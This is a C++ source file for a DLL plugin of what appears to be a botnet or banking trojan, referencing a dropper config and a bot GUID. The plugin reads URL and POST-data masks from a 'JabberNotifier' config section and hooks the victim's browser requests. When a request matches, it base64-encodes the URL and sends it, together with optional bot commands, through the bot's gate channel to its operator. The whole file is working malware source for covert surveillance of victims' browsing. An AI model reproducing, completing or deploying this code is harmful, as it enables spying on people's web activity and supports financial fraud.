#include "includes.h"

#include "debug.cpp"
#include "debugmem.cpp"
//#include "nomorewcvcrt\nomorewcvcrt.cpp"

#include "settings.h"

#include "dropper\config.h"
TDropperConfig dc;

CHAR gl_szBotName[sizeof(dc.szBotGuid)] = {0};

#include "str\str.h"

// ~~~

struct JabberNotifierConfig
{
	PCHAR szUrlMask;
	PCHAR szFlags;
	PCHAR szPostMask;
	PCHAR szBotCommand;

	LIST_ENTRY _p;
};
typedef JabberNotifierConfig *PJabberNotifierConfig;
#define GetJabberNotifierConfigBuffer(ListEntryAddress) (PJabberNotifierConfig)((PBYTE)ListEntryAddress - (sizeof(JabberNotifierConfig) - sizeof(LIST_ENTRY)));

class CJabberNotifierConfig
{
public:
	PLIST_ENTRY m_plJabberNotifierConfig;
	CJabberNotifierConfig()
	{
		m_plJabberNotifierConfig = NULL;
	}
	bool AddField(IN PCHAR szUrlMask, IN PCHAR szFlags, IN PCHAR szPostMask, IN PCHAR szBotCommand);
	void FreeAll();
	PJabberNotifierConfig CJabberNotifierConfig::FindNotifier(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szPostVars);
};

bool CJabberNotifierConfig::AddField(IN PCHAR szUrlMask, IN PCHAR szFlags, IN PCHAR szPostMask, IN PCHAR szBotCommand)
{
	PJabberNotifierConfig wcTmp				=	NULL;
	DWORD dwValueSize;

	do
	{
		wcTmp = (PJabberNotifierConfig)malloc(sizeof(JabberNotifierConfig));
		if (!wcTmp)
			break;
		ZeroMemory(wcTmp, sizeof(JabberNotifierConfig));
		// szUrlMask
		dwValueSize = (DWORD)strlen(szUrlMask);
		if ( !(wcTmp->szUrlMask = (PCHAR)malloc(dwValueSize + 1)) )
			break;
		strcpy(wcTmp->szUrlMask, szUrlMask);
		// szFlags
		if (szFlags) {
			dwValueSize = (DWORD)strlen(szFlags);
			if ( !(wcTmp->szFlags = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szFlags, szFlags);
		}
		// szPostMask
		if (szPostMask && strlen(szPostMask)) {
			dwValueSize = (DWORD)strlen(szPostMask);
			if ( !(wcTmp->szPostMask = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szPostMask, szPostMask);
		}
		// szBotCommand
		if (szBotCommand && strlen(szBotCommand)) {
			dwValueSize = (DWORD)strlen(szBotCommand);
			if ( !(wcTmp->szBotCommand = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szBotCommand, szBotCommand);
		}
		// ~~~
		if (!m_plJabberNotifierConfig)  {
			m_plJabberNotifierConfig = &wcTmp->_p;
			InitializeListHead(m_plJabberNotifierConfig);
		}
		else {
			InsertHeadList(m_plJabberNotifierConfig->Blink, &wcTmp->_p);
		}
		return true;
	}
	while (FALSE);

	if (wcTmp) {
		free(wcTmp->szUrlMask);
		free(wcTmp->szFlags);
		free(wcTmp->szPostMask);
		free(wcTmp->szBotCommand);
	}
	free(wcTmp);
	return false;
}

void CJabberNotifierConfig::FreeAll()
{
	if (!m_plJabberNotifierConfig)
		return;
	PJabberNotifierConfig pCurrent = NULL;

	for ( ; !IsListEmpty(m_plJabberNotifierConfig); free(pCurrent), pCurrent = NULL )
	{
		pCurrent = GetJabberNotifierConfigBuffer(m_plJabberNotifierConfig->Blink);
		free(pCurrent->szUrlMask);
		free(pCurrent->szFlags);
		free(pCurrent->szPostMask);
		RemoveTailList(m_plJabberNotifierConfig);
	}
	if (!pCurrent)
		return;
	pCurrent = GetJabberNotifierConfigBuffer(m_plJabberNotifierConfig);
	free(pCurrent->szUrlMask);
	free(pCurrent->szFlags);
	free(pCurrent->szPostMask);
	free(pCurrent);
}

PJabberNotifierConfig CJabberNotifierConfig::FindNotifier(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szPostVars)
{
	if (!m_plJabberNotifierConfig || !szUrl)
		return false;
	PJabberNotifierConfig pCurrent = NULL;

	INT i = 0;
	for ( PLIST_ENTRY plTmp = m_plJabberNotifierConfig; plTmp != m_plJabberNotifierConfig || !i; plTmp = plTmp->Flink, i++ )
	{
		pCurrent = GetJabberNotifierConfigBuffer(plTmp);

		// Checking Url
		DebugWrite("[DEBUG] : strcmpmask(\"%s\", \"%s\") == %s", szUrl, pCurrent->szUrlMask, strcmpmask(szUrl, pCurrent->szUrlMask) ? "TRUE" : "FALSE");
		if (strcmpmask(szUrl, pCurrent->szUrlMask))
		{
			// Checking post vars
			if (szPostVars && strlen(szPostVars))
			{
				if ( !strcmpmask(szPostVars, pCurrent->szPostMask) )
				{
					DebugWrite("[DEBUG] : Post mask { %s } : Post vars { %s }", pCurrent->szPostMask, szPostVars);
					continue;
				}
			}

			// Checking Verb
			if (szVerb && pCurrent->szFlags)
			{
				if ( ( StrStr(pCurrent->szFlags, "G") && szVerb[0] == 'G' )
				||   ( StrStr(pCurrent->szFlags, "P") && szVerb[0] == 'P' )
				   )
					return pCurrent;
				else
					return NULL;
			}
			return pCurrent;
		}
	}

	return NULL;
}

CJabberNotifierConfig wc;

// ~~~

BOOL APIENTRY DllMain(IN HINSTANCE hDllHandle, IN DWORD nReason, IN LPVOID Reserved)
{
	switch (nReason)
	{
	case DLL_PROCESS_ATTACH:
		break;
	}
    return TRUE;
}

//#define WEBFAKES_DIV	'|'

PCHAR Parser_GotoNextLine(IN PCHAR szSrc)
{
	for (; szSrc[0] != '\0'; szSrc++)
		if (szSrc[0] == '\n')
			return ++szSrc;
	return NULL;
}

DLLEXPORT bool Init(char *szConfig)
{
	if (!szConfig)
		return false;

	DWORD dwLength = strlen(szConfig);
	PCHAR szBuffer = (PCHAR)malloc(dwLength + 1);
	if (!szBuffer)
		return false;
	strcpy(szBuffer, szConfig);

	do
	{
		// Vars
		CHAR szWebFakes[] = "entry \"JabberNotifier\"";
		PCHAR szPos;
		PCHAR szNextLine;
		PCHAR szOptionStringPnt;
		PCHAR szOptionStringPntEnd;
		DWORD dwOptionStringType;
		// JabberNotifier options vars
		PCHAR szOptionStrings[4] = {0};
		// Finding { entry "JabberNotifier" }
		szPos = StrStr(szBuffer, szWebFakes);
		if (!szPos) {
			DebugWrite("[ERROR] : Cannot find \"%s\" section", szWebFakes);
			break;
		}
		szPos += sizeof(szWebFakes) - 1;
		// Next line
		if (!(szPos = Parser_GotoNextLine(szPos))) {
			DebugWrite("[ERROR] : Cannot find next line");
			break;
		}
		// Finding webfake options
		for (; szPos && szPos[0] != '\0'; szPos++)
		{
			// Comment
			if (szPos[0] == ';') {
				DebugWrite("[DEBUG] : Skipping comment stuff");
				szPos = Parser_GotoNextLine(szPos);
				continue;
			}
			// Line with options
			if (szPos[0] == '"')
			{
				szNextLine = Parser_GotoNextLine(szPos);
				if (!szNextLine) {
					DebugWrite("[ERROR] : Cannot find next line");
					break;
				}
				dwOptionStringType = 0;
				for (; szPos && szPos[0] != '\0' && szPos != szNextLine && dwOptionStringType < sizeof(szOptionStrings); szPos++)
				{
					if (szPos[0] == '"')
					{
						szOptionStringPnt = szPos + 1;
						// Finding end of option string
						szOptionStringPntEnd = StrStr(szOptionStringPnt, "\"");
						if (!szOptionStringPntEnd) {
							DebugWrite("[ERROR] : Cannot find end of string");
							szPos = Parser_GotoNextLine(szPos);
							break;
						}
						// Push this string into special array
						szOptionStrings[dwOptionStringType++] = szOptionStringPnt;
						szOptionStringPntEnd[0] = '\0';
						// Searching for next option string
						szPos += (szOptionStringPntEnd - szOptionStringPnt) + 1;
						szOptionStringPnt = NULL;
					}
				}
				szPos--;
				// Adding new webfake
				wc.AddField(szOptionStrings[0], szOptionStrings[1], szOptionStrings[2], szOptionStrings[3]);
				// Clearing special array
				ZeroMemory(szOptionStrings, sizeof(szOptionStrings));
			}
		}

	}
	while (FALSE);
	
	free(szBuffer);

	return true;
}

DLLEXPORT bool Start()
{
	return true;
}


DLLEXPORT bool Stop()
{
	wc.FreeAll();
	return true;
}

DLLEXPORT BOOL IsGlobal() { return TRUE; }

// ~~~

typedef VOID (__cdecl *GATEPAGESENDMSG)(IN BOOL isOutput, IN PCHAR szMessage);
GATEPAGESENDMSG gl_lpGatePageSendMsg;

DLLEXPORT VOID TakeGatePipeSendMsg ( IN LPVOID lpFunc )
{
	gl_lpGatePageSendMsg = (GATEPAGESENDMSG)lpFunc;
}


// ~~~

static const char base64_chars[] = {
	"ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
	"abcdefghijklmnopqrstuvwxyz" \
	"0123456789+/" };

static inline bool is_base64(unsigned char c) {
	return (isalnum(c) || (c == '+') || (c == '/'));
}

int base64_decode(char* encoded_string, int in_len, char* ret) 
{
	int i = 0;
	int j = 0;
	int k = 0;
	int in_ = 0;
	unsigned char char_array_4[4], char_array_3[3];
	int iret = 0;

	while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_])) {
		char_array_4[i++] = encoded_string[in_]; in_++;
		if (i == 4) {
			for (i = 0; i <4; i++)
				for (j = 0; j < sizeof base64_chars - 1; j++)
					if (char_array_4[i] == base64_chars[j]) {
						char_array_4[i] = (unsigned char)j;
						break;
					}

					char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
					char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
					char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];

					for (i = 0; (i < 3); i++)
						ret[iret++] = char_array_3[i];
					i = 0;
		}
	}

	if (i) {
		for (j = i; j <4; j++)
			char_array_4[j] = 0;

		for (j = 0; j <4; j++)
			for (k = 0; k < sizeof base64_chars - 1; k++)
				if (char_array_4[j] == base64_chars[k]) {
					char_array_4[j] = (unsigned char)k;
					break;
				}

				char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
				char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
				char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];

				for (j = 0; (j < i - 1); j++) ret[iret++] = char_array_3[j];
	}
	ret[iret] = '\0';
	return iret;
}

int base64_encode(char const* bytes_to_encode, unsigned int in_len, char *ret) 
{
	int i = 0;
	int j = 0;
	int ret_i = 0;
	unsigned char char_array_3[3];
	unsigned char char_array_4[4];

	while (in_len--)
	{
		char_array_3[i++] = *(bytes_to_encode++);
		if (i == 3) {
			char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
			char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
			char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
			char_array_4[3] = char_array_3[2] & 0x3f;

			for(i = 0; (i <4) ; i++)
				ret[ret_i++] = base64_chars[char_array_4[i]];
			i = 0;
		}
	}

	if (i)
	{
		for(j = i; j < 3; j++)
			char_array_3[j] = '\0';

		char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
		char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
		char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
		char_array_4[3] = char_array_3[2] & 0x3f;

		for (j = 0; (j < i + 1); j++)
			ret[ret_i++] = base64_chars[char_array_4[j]];

		while((i++ < 3)) ret[ret_i] = '=';
	}
	ret[ret_i] = '\0';

	return ret_i;
}

// ~~~

DLLEXPORT void Callback_OnBeforeProcessUrl(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szHeaders, IN PCHAR szPostVars, OUT PDWORD lpdwProcessMode)
{
	CHAR szMsg[INTERNET_MAX_URL_LENGTH * 2 + 1];
	CHAR szEnc[INTERNET_MAX_URL_LENGTH * 2 + 1];
	PJabberNotifierConfig pCurrent;

	if (!szUrl)
		return;
	
	DebugEnter("[DEBUG] : szUrl == { %s }; szVerb == { %s }; szPostVars == { %s }; szHeaders = \n{ %s }", szUrl, szVerb, szPostVars, szHeaders);
	
	pCurrent = wc.FindNotifier(szUrl, szVerb, szPostVars);
	if (pCurrent)
	{
		base64_encode(szUrl, strlen(szUrl), szEnc);

		_snprintf(szMsg, sizeof(szMsg) - 1, "jm=%s", szEnc);
		szMsg[sizeof(szMsg) - 1] = '\0';

		if (pCurrent->szBotCommand)
			gl_lpGatePageSendMsg(TRUE, pCurrent->szBotCommand);

		gl_lpGatePageSendMsg(FALSE, szMsg);
	}
	DebugLeave("");
}
